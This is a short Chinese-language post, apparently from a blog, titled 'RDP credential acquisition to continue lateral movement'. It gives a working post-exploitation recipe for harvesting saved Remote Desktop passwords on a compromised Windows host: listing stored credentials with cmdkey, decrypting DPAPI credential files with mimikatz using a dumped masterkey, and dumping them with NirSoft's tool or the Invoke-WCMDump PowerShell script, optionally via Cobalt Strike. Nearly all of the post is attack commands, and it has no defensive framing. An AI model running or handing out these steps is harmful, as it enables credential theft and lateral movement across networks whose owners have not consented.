RDP凭据获取继续横向

RDP凭据获取继续横向

文章目录

猕猴桃获取密码

有可能这台机器保存登录其他机器rdp

#查看mstsc的连接纪录
cmdkey /list 

#查找本地的Credentials:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

RDP凭据获取继续横向

如果存在,可以使用mimikatz

记录这个值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\9D26EE720EDC4D95AF94298895D92FA9"

RDP凭据获取继续横向

执行找到guidMasterKey值对应的guid下的MasterKer值

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" >1.txt

RDP凭据获取继续横向

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\9D26EE720EDC4D95AF94298895D92FA9 /masterkey:9d112cafdfc47142e80b38fecc3c9738ff844db85ce15e2e035f21c7727a76334c725a16942df1769a0ece1e68c7aeb6a484a877d538494201029be8d7914213"

RDP凭据获取继续横向

破解密码,登录机器

network password

下载地址:https://www.nirsoft.net/utils/network_password_recovery.html

RDP凭据获取继续横向

通过powershell脚本

下载地址:https://github.com/peewpw/Invoke-WCMDump

Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

也可以直接cs使用

上一篇:远程桌面协议 (VNC/SPICE/RDP)


下一篇:windows 远程连接到ubuntu20.04 最佳解决方案